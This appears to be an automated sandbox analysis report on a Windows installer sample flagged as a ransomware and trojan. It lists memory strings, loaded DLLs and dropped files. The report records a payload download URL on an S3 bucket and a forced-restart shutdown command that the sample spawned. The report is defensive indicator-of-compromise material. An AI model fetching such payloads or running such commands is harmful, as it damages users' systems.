          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.dll
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.exe
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.nuspec
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.psmdcp
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.rels
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.shasum
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://ocsp.digicert.com0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://ocsp.digicert.com0A
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, ClassicIE_64.exe0.12.dr, ClassicExplorerSettings.exe.12.dr, ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.dr, FilePost?a.exe.2.dr, ClassicStartMenu.exe.12.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://ocsp.digicert.com0L
          Source: ClassicIE_64.exe0.12.dr, ClassicExplorerSettings.exe.12.dr, ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.dr, ClassicStartMenu.exe.12.drString found in binary or memory: http://ocsp.digicert.com0N
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://ocsp.digicert.com0X
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
          Source: Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlformats.or
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
          Source: ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.drString found in binary or memory: http://www.classicshell.net
          Source: ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.drString found in binary or memory: http://www.classicshell.net%s%sClassicShell.chm%s%sClassicShell.chm::/%s.html
          Source: ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.drString found in binary or memory: http://www.classicshell.net/files/updates/update_PA
          Source: rundll32.exe, rundll32.exe, 0000000C.00000002.4088855611.0000000000428000.00000020.00000001.01000000.0000000D.sdmp, Main.dll.7.dr, ClassicIE_64.dll.12.drString found in binary or memory: http://www.delphiforfun.org/
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://www.vmware.com/0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://www.vmware.com/0/
          Source: ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.drString found in binary or memory: http://www.yoursite.com
          Source: Update.exeString found in binary or memory: https://api.github.com/#
          Source: rundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/
          Source: rundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/Vh$o
          Source: rundll32.exe, 0000000C.00000002.4091911884.000001A76A901000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.4093722104.000001A76AAAF000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.4091911884.000001A76A8DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zip
          Source: rundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zip8
          Source: rundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zipv
          Source: Update.exeString found in binary or memory: https://github.com/myuser/myrepo
          Source: rundll32.exe, 0000000C.00000002.4091911884.000001A76A94F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, ClassicIE_64.exe0.12.dr, ClassicExplorerSettings.exe.12.dr, ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.dr, FilePost?a.exe.2.dr, ClassicStartMenu.exe.12.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: https://www.globalsign.com/repository/0
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownHTTPS traffic detected: 16.12.1.14:443 -> 192.168.2.4:49729 version: TLS 1.2

          System Summary

          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00346EA0 memset,EnterCriticalSection,EnterCriticalSection,memcpy,LeaveCriticalSection,GetTokenInformation,GetLastError,Warning,GetTokenInformation,EqualSid,LeaveCriticalSection,Warning,Warning,free,free,DuplicateTokenEx,GetLastError,free,free,AllocateAndInitializeSid,GetLastError,Warning,SetTokenInformation,GetLastError,Warning,FreeSid,free,free,Warning,GetLastError,free,ImpersonateLoggedOnUser,GetLastError,Warning,GetLastError,free,_stricmp,free,free,Warning,Warning,CreateProcessAsUserW,free,free,GlobalMemoryStatusEx,GetLastError,free,free,SetProcessWorkingSetSize,GetLastError,ResumeThread,CloseHandle,free,free,GetLastError,GetCurrentProcess,IsWow64Process,GetTokenInformation,GetLastError,Warning,free,free,Warning,Warning,free,free,free,free,free,free,Warning,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,3_2_00346EA0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: String function: 00343B70 appears 41 times
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: String function: 003427C0 appears 89 times
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: String function: 003493B4 appears 49 times
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: String function: 6D168690 appears 58 times
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Resource name: DATA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: Full Glass.skin.12.drStatic PE information: No import functions for PE file found
          Source: Smoked Glass.skin.12.drStatic PE information: No import functions for PE file found
          Source: Windows Aero.skin7.12.drStatic PE information: No import functions for PE file found
          Source: EppManifest.dll.12.drStatic PE information: No import functions for PE file found
          Source: Classic Skin.skin.12.drStatic PE information: No import functions for PE file found
          Source: Windows Basic.skin.12.drStatic PE information: No import functions for PE file found
          Source: Metro.skin.12.drStatic PE information: No import functions for PE file found
          Source: Windows 8.skin7.12.drStatic PE information: No import functions for PE file found
          Source: Windows 8.skin.12.drStatic PE information: No import functions for PE file found
          Source: Classic Skin.skin7.12.drStatic PE information: No import functions for PE file found
          Source: Metro.skin7.12.drStatic PE information: No import functions for PE file found
          Source: Windows Aero.skin.12.drStatic PE information: No import functions for PE file found
          Source: Midnight.skin7.12.drStatic PE information: No import functions for PE file found
          Source: MsMpLics.dll.12.drStatic PE information: No import functions for PE file found
          Source: Windows XP Luna.skin.12.drStatic PE information: No import functions for PE file found
          Source: Metallic.skin7.12.drStatic PE information: No import functions for PE file found
          Source: 00023948209303294#U00ac320302282349843984903.exe, 00000001.00000003.1630405410.00000000012B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe2 vs 00023948209303294#U00ac320302282349843984903.exe
          Source: 00023948209303294#U00ac320302282349843984903.exe, 00000001.00000003.1630405410.00000000012BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe2 vs 00023948209303294#U00ac320302282349843984903.exe
          Source: 00023948209303294#U00ac320302282349843984903.exeBinary or memory string: OriginalFilenameSetup.exe6 vs 00023948209303294#U00ac320302282349843984903.exe
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: msvcp140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: d3d9.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: msctfui.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: uiautomationcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: explorerframe.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: vmwarebase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: vmwarebase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\shutdown.exeSection loaded: shutdownext.dllJump to behavior
          Source: C:\Windows\System32\shutdown.exeSection loaded: sspicli.dllJump to behavior
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Full Glass.skin.12.drStatic PE information: Section .rsrc
          Source: Smoked Glass.skin.12.drStatic PE information: Section .rsrc
          Source: Windows Aero.skin7.12.drStatic PE information: Section .rsrc
          Source: Classic Skin.skin.12.drStatic PE information: Section .rsrc
          Source: Windows Basic.skin.12.drStatic PE information: Section .rsrc
          Source: Metro.skin.12.drStatic PE information: Section .rsrc
          Source: Windows 8.skin7.12.drStatic PE information: Section .rsrc
          Source: Windows 8.skin.12.drStatic PE information: Section .rsrc
          Source: Classic Skin.skin7.12.drStatic PE information: Section .rsrc
          Source: Metro.skin7.12.drStatic PE information: Section .rsrc
          Source: Windows Aero.skin.12.drStatic PE information: Section .rsrc
          Source: Midnight.skin7.12.drStatic PE information: Section .rsrc
          Source: Windows XP Luna.skin.12.drStatic PE information: Section .rsrc
          Source: Metallic.skin7.12.drStatic PE information: Section .rsrc
          Source: PostWallet-1.0.0-full.nupkgBinary or memory string: y.vBP
          Source: classification engineClassification label: mal80.rans.troj.evad.winEXE@25/60@1/1
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00345C70 Warning,Warning,GetLastError,Warning,Warning,Warning,GetLastError,Warning,Warning,StartServiceW,GetLastError,Warning,GetTickCount,QueryServiceStatus,GetTickCount,GetTickCount,Sleep,QueryServiceStatus,GetLastError,Warning,Warning,Warning,3_2_00345C70
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00345EE0 Warning,Warning,strrchr,memset,GetModuleFileNameW,GetLastError,WSCSetApplicationCategory,WSCSetApplicationCategory,Warning,Warning,WSAStartup,WSAGetLastError,Warning,StartServiceCtrlDispatcherW,GetLastError,3_2_00345EE0
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic ShellJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWalletJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_03
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
